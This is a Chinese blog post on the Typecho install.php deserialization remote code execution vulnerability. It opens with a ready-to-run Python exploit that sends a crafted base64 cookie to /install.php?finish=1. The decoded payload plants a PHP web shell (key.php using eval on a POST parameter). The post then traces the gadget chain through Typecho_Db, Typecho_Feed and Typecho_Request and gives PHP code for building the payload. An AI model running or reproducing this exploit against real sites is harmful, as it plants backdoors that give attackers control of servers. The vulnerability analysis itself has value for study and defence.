install.php 运行,Typecho Install.php 任意代码执行

最新推荐文章于 2023-02-22 15:44:23 发布
最新推荐文章于 2023-02-22 15:44:23 发布
阅读量243 收藏
点赞数
文章标签: install.php 运行

payload

#coding=UTF-8

import requests

import optparse

def exp(request_url):

url = request_url+"/install.php?finish=1"

headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Encoding': 'gzip, deflate, compress',

'Accept-Language': 'en-us;q=0.5,en;q=0.3',

'Cache-Control': 'max-age=0',

'Referer':request_url+'/install.php',

'Connection': 'close',

'Cookie': '__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjA6ImZpbGVfcHV0X2NvbnRlbnRzKCdrZXkucGhwJywgJzw/cGhwIEBldmFsKCRfUE9TVFtwYXNzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==',

#'Cookie': '__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTc6ImZpbGVfcHV0X2NvbnRlbnRzKCdwMC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo0OiJldmFsIjt9fX19fXM6NjoicHJlZml4IjtzOjc6InR5cGVjaG8iO30=',

'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'}

s = requests.Session()

s.headers.update(headers)

z = s.get(url=url)

print z.content

parser = optparse.OptionParser("usage%prog" + "-u ")

parser.add_option('-u', dest = 'tgturl', type = 'string', help = "please scand url.")

(options,args) = parser.parse_args()

tgturl = options.tgturl

exp(tgturl)

原理

这是一个PHP序列化的漏洞

原因出在网站根目录下install.php里

......

......

$config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_config')));

Typecho_Cookie::delete('__typecho_config');

$db = new Typecho_Db($config['adapter'], $config['prefix']);

$db->addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);

Typecho_Db::set($db);

?>

这里可以看出,只要存在finish,并且__typecode_config的cookie存在,就可以对base64加密过的cookie进行序列化。

下面又把config里的adapter和prefix使用Typecho_Db进行实例化,并且调用了addServer的方法,下面,我们进入Typecho_Db瞄一瞄:

当然序列化后的对象,我们无法直接调用方法,所以,我们必须找一些能特殊调用的方法,比如构造函数,析构函数之类的,

这里,我们在Db.php中对象的构造函数下发现了:

public function __construct($adapterName, $prefix = 'typecho_')

{

/** 获取适配器名称 */

$this->_adapterName = $adapterName;

/** 数据库适配器 */

$adapterName = 'Typecho_Db_Adapter_' . $adapterName;

if (!call_user_func(array($adapterName, 'isAvailable'))) {

throw new Typecho_Db_Exception("Adapter {$adapterName} is not available");

}

$this->_prefix = $prefix;

/** 初始化内部变量 */

$this->_pool = array();

$this->_connectedPool = array();

$this->_config = array();

//实例化适配器对象

$this->_adapter = new $adapterName();

}

这里存在一个$adapterName字符串进行了拼接,所以就能触发__string()方法

我们可以全局搜素__toString()方法,观察有没有我们需要的:

a77af05294b4

我们发现了这里存在问题:

public function __toString()

{

$result = '<?xml version="1.0" encoding="' . $this->_charset . '"?>' . self::EOL;

if (self::RSS1 == $this->_type) {

......

} else if (self::ATOM1 == $this->_type) {

......

foreach ($this->_items as $item) {

......

' . $item['author']->screenName . '

' . $item['author']->url . '

到这里,我们知道item['author']中screenName的键值如果不可访问,就会触发__get()函数

我们再去寻找get函数:

a77af05294b4

我们寻找到一个request的对象:

public function __get($key)

{

return $this->get($key);

}

public function get($key, $default = NULL)

{

switch (true) {

case isset($this->_params[$key]):

$value = $this->_params[$key];

break;

case isset(self::$_httpParams[$key]):

$value = self::$_httpParams[$key];

break;

default:

$value = $default;

break;

}

$value = !is_array($value) && strlen($value) > 0 ? $value : $default;

return $this->_applyFilter($value);

}

这里对_params属性进行赋值,把结果传入value,最后返回_applyFilter($value),我们跟到这个函数里看看:

private function _applyFilter($value)

{

if ($this->_filter) {

foreach ($this->_filter as $filter) {

$value = is_array($value) ? array_map($filter, $value) :

call_user_func($filter, $value);

}

$this->_filter = array();

}

return $value;

}

这里就比较的清晰明了了,array_map()可以把数组中的每个值发送到用户自定义函数,返回新的值。call_user_func 可以把第一个参数作为回调函数调用,也就是说,都可以命令执行,由于我们第二个参数是数组,所以,我们不能使用eval,那我们就使用assert来实现命令执行,最后,构造整个的序列化:

class Typecho_Feed{

private $_type = 'ATOM 1.0';

private $_items = array();

public function addItem(array $item){

$this->_items[] = $item;

}

}

class Typecho_Request{

private $_params = array('screenName'=>'file_put_contents(\'key.php\', \'<?php @eval($_POST[pass]);?>\')');

private $_filter = array('assert');

}

$zz = new Typecho_Feed();

$hh = new Typecho_Request();

$zz->addItem(array('author' => $hh));

$exp = array('adapter' => $payload1, 'prefix' => 'typecho');

echo base64_encode(serialize($exp));

?>

最后,得到的就是结果了。

实现一下:

a77af05294b4

a77af05294b4

父母世界
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[从typecho入坑PHP系列]typecho系统的整体结构与安装的跳转
做一个全栈美男子
04-02 900
Typecho的结构 从官网下载typecho后,解压,打开文件夹build,可以看见Typecho的结构。 /admin/ /install/ /usr/ /var/ /license.txt /index.php /install.php 三个文件分别是index.phpinstall.php和LICENSE.txt,其中LICENSE.txt是软件协议,也就是我们使用Typecho...
typecho install.php,typecho/install.php at master · watervip/typecho · GitHub
weixin_33657398的博客
03-21 58
$installDb->query($installDb->insert('table.options')->rows(array('name' => 'routingTable', 'user' => 0, 'value' => 'a:25:{s:5:"index";a:3:{s:3:"url";s:1:"/";s:6:"widget";s:14:"Widge...
install php,install.php
weixin_33668998的博客
03-19 452
/*** [WeiZan System] Copyright (c) 2014 WEIZANCMS.COM*/error_reporting(E_ALL ^ E_NOTICE);@set_time_limit(0);@set_magic_quotes_runtime(0);ob_start();define('IA_ROOT', str_replace("\\",'/', dirname(__FI...
typecho install.php,typecho - install.php到底删不删?
weixin_34640289的博客
03-21 322
从安装好后正常了几天,也发了几篇文章,之后就出问题了,先是登录自动跳到install.php,然后把install.php文件删了,又提示miss config file,那么具体问问:1.安装好后install.php文件删不删?2.config.ini.php文件在哪里? 是否是安装后自动生成在运行环境根目录的?.回复内容:从安装好后正常了几天,也发了几篇文章,之后就出问题了,先是登录自动跳到...
typecho install.php,typecho-install.php到底删不删?
weixin_36339234的博客
03-21 155
从安装好后正常了几天,也发了几篇文章,之后就出问题了,先是登录自动跳到install.php,然后把install.php文件删了,又提示miss config file,那么具体问问:1.安装好后install.php文件删不删?2.config.ini.php文件在哪里? 是否是安装后自动生成在运行环境根目录的?.回复内容:从安装好后正常了几天,也发了几篇文章,之后就出问题了,先是登录自动跳到...
基于PHPTypecho数据库定时备份插件.zip
最新发布
02-28
**基于PHPTypecho数据库定时备份插件** Typecho是一个轻量级的开源博客系统,以其简洁、高效的特性深受开发者喜爱。在这个项目中,我们关注的是一个为Typecho设计的数据库定时备份插件,它能够确保您的博客数据...
基于PHPtypecho下载网站模板 php版.zip
07-23
在使用此模板时,开发者或网站管理员需要将模板代码Typecho博客系统集成,通过PHP处理下载链接、统计下载次数、管理资源分类等业务逻辑。同时,为了提高用户体验,还可能需要考虑SEO优化、速度优化、安全性等方面...
基于PHPtypecho下载网站模板php版源码.zip
08-29
这样的模板通常包含HTML、CSS、JavaScript以及PHP代码,它们共同作用于网站的布局、样式、交互以及功能实现。下载网站模板通常会包含以下关键部分: 1. **主题文件夹**:包含所有模板文件,如header.php(页头)、...
基于PHPtypecho下载网站模板 php版 v1.2.zip
07-23
【标题】"基于PHPTypecho下载网站模板 php版 v1.2.zip"指的是一个用于构建下载类网站的模板,该模板是专为Typecho博客系统设计的,并且基于PHP编程语言。Typecho是一个轻量级、开源的博客平台,采用PHP语言编写,...
typecho-theme-next:(重构中)Hexo 主题 NexT.Mist 的 Typecho 移植版
05-09
typecho-theme-next Hexo 主题 的 Typecho 移植版。 新版本重构 计划与 Hexo 版本保持同步,支持所有的 Schemes,可通过主题设置配置: Next.Mist (以这个为基础) Next.Muse Next.Pisces Next.Gemini 正在做的: ...
ubtuun怎么运行PHP文件_如何通过Linux命令行使用和运行PHP脚本
weixin_33510623的博客
02-11 160
下面通过图文并茂的方式给大家分享下通过Linux命令使用和运行PHP脚本。PHP是一个开源服务器端脚本语言,最初这三个字母代表的是“Personal Home Page”,而现在则代表的是“PHP:Hypertext Preprocessor”,它是个递归首字母缩写。它是一个跨平台脚本语言,深受C、C++和Java的影响。在 Linux 命令行中运行 PHP 代码PHP的语法和C、Java以及带有...
nstall.php a data,通过Typecho install.php 后门理解PHP对象注入 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_34996214的博客
04-03 230
刚好在学习PHP反序列化,听说有这么个后门,尝试着分析下,可能有写的不对的地方,还请指教。首先介绍下序列化与反序列化。序列化是对象串行化,对象是一种在内存中存储的数据类型,寿命随生成该对象的程序的终止而终止,为了持久使用对象的状态,将其通过serialize()函数进行序列化为一行字符串保存为文件,使用时通过unserialize()反序列化为对象。反序列化的过程就是重新执行一遍某个指定的程序流程...
Typecho install.php 反序列化导致任意代码执行
astarblog的博客
11-06 211
近期看到typecho任意代码执行漏洞,才记得我的博客有好久没有更新了,特来将其“捡起来”,日 后养成将博客来时时更新!好了来说下关入这个漏洞:http://p0sec.net/index.php/archives/114/ 网上关于这个的写的很详细我也在我我本地进行了测试,确实是存在的,下面是我测试的步骤1.http://127.0.0.1/typecho/in...
初识php(安装、配置与运行
魔筝炼药师
07-07 218
简介 安装 Mac安装php,使用一下命令即可。 brew install php 配置 运行 参考链接: https://www.php.net/manual/zh/install.macosx.php https://baijiahao.baidu.com/s?id=1664982720033364983&wfr=spider&for=pc https://www.cnblogs.com/linxue/p/9929028.html https://...
install.php程序,PHP install
weixin_28775337的博客
03-10 97
PHP7 整合了 Fastcgi启动项变成了 php-fpm首先要安装php所需要的依赖库#yum -y install libjpeg libjpeg-devel libpng libpng-devel freetype freetype-defel libxml2 libxml2-devel pcre-devel curl-devel libxslt-devel// 下载php//解压# xz...
[从typecho入坑PHP系列]install怎么进行安装准备?
做一个全栈美男子
04-02 645
install的作用 顾名思义,install的作用就是安装, 那如果有人已经安装过了呢?并不是所有人都会直接输入域名让服务器自动跳转到index.php(之所以看不到后缀,只看见域名是因为伪静态),如果有人可以输入域名/install.php是不是会再次安装呢?当然不是! 第一件事:确认 未安装时,入口文件index.php检查完未安装后,将页面跳转到install.php。 为了防止安装后通过...
typecho install.phpl漏洞分析
le31ei的博客
12-06 830
漏洞出了很久了一直没时间分析,现在有空记录下分析流程,学习下php反序列化的知识。
windows系统安装php运行php
m0_63834711的博客
02-22 7442
windows系统安装php运行php
install.php 源码,PHP7.2源码安装的方法
weixin_29375669的博客
03-19 217
PHP7.2源码安装的方法发布时间:2021-03-16 09:47:50来源:亿速云阅读:51作者:小新这篇文章将为大家详细讲解有关PHP7.2源码安装的方法,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。php有什么用php是一个嵌套的缩写名称,是英文超级文本预处理语言,它的语法混合了C、Java、Perl以及php自创新的语法,主要用来做网站开发,许多小型网...
debian安装typecho
04-29
Typecho 的官方网站(https://typecho.org/download/)上下载最新的 Typecho 压缩包,然后解压缩。 3. 将 Typecho 文件复制到 Apache 的文档根目录: 将解压后的 Typecho 文件夹复制到 Apache 的文档根目录,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值